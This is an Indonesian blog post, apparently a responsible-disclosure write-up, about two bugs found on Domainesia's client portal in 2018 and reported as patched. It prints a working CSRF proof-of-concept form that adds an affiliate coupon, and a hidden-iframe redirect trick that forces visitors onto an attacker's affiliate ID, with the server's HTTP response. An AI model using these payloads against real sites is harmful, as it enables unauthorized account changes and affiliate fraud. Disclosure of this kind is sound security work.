Domainesia.... mungkin anda akan berfikir situs penyedia hosting dan domain murah...
sebenar nya situs-situs besar jarang sekali memiliki bug bisa di bilang sempurna lah untuk sekelas penyedia hosting dan domain besar ini.
Mas eka syahwan sendiri melakukan pencarian bug di situs domainesia karena faktor bosan ingin berbuat apa dan yang menjadi bahan pelampiasan nya situs domainesia ( gabutan gayn ).ternyata oh ternyata mas eka syahwan ternyata menemukan 2 bug pada situs domainesia.
Bug yang pertama di temukan oleh mas eka syahwan sendiri bug csrf. apa itu csrf ? baca artikel nya di sini
pada bug csrf ini mas eka syahwan sendiri mencoba melakukan penambahan kupon affiliasi ternyata berhasil..
Untuk Proof Of Concept ( POC ) :
Untuk lebih jelas nya anda bisa melihat video nya langsung :
<form action=”https://my.domainesia.com/index.php?m=affcoupons" method=”POST”> <input type=”hidden” name=”token”> <input type=”hidden” name=”cmd” value=”add”> <input type=”hidden” name=”code” value=”xc”> <input type=”hidden” name=”type” value=”UGVyY2VudGFnZUAxQDIwQEAxMDQsMTA1LDEwNiwxMDcsMTA4LDExMiwxMTMsMTE0QEAwQDBAMEAw”> <input type=”submit” name=”Submit” value=”Add+New+Coupon”> </form>
Bug yang kedua di temukan oleh mas eka syahwan adalah bug bypass affiliate
Untuk skenario nya :
https://www.domainesia.com/?aff=5340 jika anda mengunakan tautan ini dan di iframe tidak akan berhasil karena adanya
x-frame-options: SAMEORIGIN
oleh karena itu Attacker membuat sebuah iframe dan di taruh di web yang ramai.
<iframe style="display: none" src="https://my.domainesia.com/dologin.php?email=×tamp=&hash=&goto=aff.php?aff=**5340**&incorrect=false"></iframe>
5340 merupakan ID affiliate
goto merupakan halaman redirect.
Contoh :
https://my.domainesia.com/dologin.php?email=×tamp=&hash=&goto= xxx.php maka akan di ahlikan ke
https://my.domainesia.com/xxx.php?incorrect=true
jadi bisa di simpulkan jika kita masukan https://my.domainesia.com/dologin.php?email=×tamp=&hash=&goto=aff.php?aff=5340 &incorrect=false maka akan menjadi https://my.domainesia.com/aff.php?aff=5340
Untuk respons permintaan data :
Request URL: https://my.domainesia.com/dologin.php?email=×tamp=&hash=&goto=aff.php?aff=5340&incorrect=false
Request Method: GET
Status Code: 302
Remote Address: 139.162.55.180:443
cache-control: max-age=0, no-cache, no-store, must-revalidate, post-check=0, pre-check=0
content-type: text/html; charset=utf-8
date: Sun, 16 Dec 2018 16:59:10 GMT
location: aff.php?aff=5340&incorrect=true
pragma: no-cache
server: nginx
set-cookie: xxxx=xxx; path=/; secure; HttpOnly
set-cookie: xxx=xxxx; path=/; secure; HttpOnly
status: 302
strict-transport-security: max-age=31536000; includeSubdomains; preload
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-page-speed: Deneva
x-xss-protection: 1; mode=block
Untuk lebih jelas nya anda bisa melihat video nya:
Untuk log pelaporan bug yang di lakukan oleh mas eka syahwan anda bisa melihat nya di bawah ini
17.12.18 : Mengirimkan informasi bug/celah.
17.12.18 : Pihak domainesia mengkonfirmasi bahwa bug lagi proses perbaikan.
17.12.18 : Pihak domainesia mengkonfirmasi bahwa bug sudah di patch dan saya suruh melakukan pengecekan kembali. dan bug sudah di patch oleh pihak domainesia.
17.12.18 : Reward yang di dapatkan oleh mas eka syahwan ? pengalaman yang sangat berharga sekali bisa
menemukan bug di situs domainesia.
thanks to :
Untuk sedikit info sebenar nya eka syahwan melakukan pencarian bug bounty tepat nya pada tanggal 17 desember 2018 terimakasih.
No comments:
Post a Comment